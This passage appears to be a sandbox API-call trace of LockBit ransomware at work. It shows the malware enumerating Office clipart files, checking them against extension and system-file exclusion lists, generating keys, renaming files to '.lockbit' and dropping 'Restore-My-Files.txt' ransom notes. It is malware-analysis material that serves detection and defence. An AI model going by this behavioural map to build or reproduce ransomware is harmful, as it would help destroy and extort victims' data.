(in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5655cfd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x662a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199423.WMF", cAlternateFileName="")) returned 1 [0150.615] lstrcmpiW (lpString1=".", lpString2="J0199423.WMF") returned -1 [0150.615] lstrcmpiW (lpString1="..", lpString2="J0199423.WMF") returned -1 [0150.615] PathFindExtensionW (pszPath="J0199423.WMF") returned=".WMF" [0150.615] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.615] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.616] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.616] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199423.WMF") returned 1 [0150.617] lstrcmpiW (lpString1="ntldr", lpString2="J0199423.WMF") returned 1 [0150.617] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199423.WMF") returned 1 [0150.617] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199423.WMF") returned -1 [0150.617] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199423.WMF") returned -1 [0150.617] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199423.WMF") returned 1 [0150.617] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199423.WMF") returned -1 [0150.617] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.617] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199423.WMF") returned=".WMF" [0150.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.617] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.617] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.618] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.618] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199423.WMF.lockbit") returned 72 [0150.618] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199423.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199423.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.619] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.619] malloc (_Size=0x40068) returned 0x3df0008 [0150.619] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=26154) returned 1 [0150.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.621] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.627] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199423.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199423.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.627] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.627] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.630] free (_Block=0x1fa2ed8) [0150.630] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199423.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.630] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.630] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.630] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199429.WMF", cAlternateFileName="")) returned 1 [0150.630] lstrcmpiW (lpString1=".", lpString2="J0199429.WMF") returned -1 [0150.630] lstrcmpiW (lpString1="..", lpString2="J0199429.WMF") returned -1 [0150.631] PathFindExtensionW (pszPath="J0199429.WMF") returned=".WMF" [0150.631] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.631] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.632] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.632] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199429.WMF") returned 1 [0150.633] lstrcmpiW (lpString1="ntldr", lpString2="J0199429.WMF") returned 1 [0150.633] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199429.WMF") returned 1 [0150.633] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199429.WMF") returned -1 [0150.633] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199429.WMF") returned -1 [0150.633] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199429.WMF") returned 1 [0150.633] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199429.WMF") returned -1 [0150.633] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.633] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199429.WMF") returned=".WMF" [0150.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.633] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.633] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.634] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.634] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199429.WMF.lockbit") returned 72 [0150.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199429.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199429.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.635] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.635] malloc (_Size=0x40068) returned 0x3df0008 [0150.636] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16676) returned 1 [0150.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.637] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.643] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199429.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199429.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.643] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.643] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.644] free (_Block=0x1fa2ed8) [0150.645] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199429.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.645] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.645] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.645] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5655cfd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x13c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199465.WMF", cAlternateFileName="")) returned 1 [0150.645] lstrcmpiW (lpString1=".", lpString2="J0199465.WMF") returned -1 [0150.645] lstrcmpiW (lpString1="..", lpString2="J0199465.WMF") returned -1 [0150.645] PathFindExtensionW (pszPath="J0199465.WMF") returned=".WMF" [0150.645] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.645] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.646] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.646] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199465.WMF") returned 1 [0150.647] lstrcmpiW (lpString1="ntldr", lpString2="J0199465.WMF") returned 1 [0150.647] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199465.WMF") returned 1 [0150.647] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199465.WMF") returned -1 [0150.647] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199465.WMF") returned -1 [0150.647] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199465.WMF") returned 1 [0150.647] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199465.WMF") returned -1 [0150.647] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.647] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199465.WMF") returned=".WMF" [0150.647] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.647] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.647] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.648] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.648] 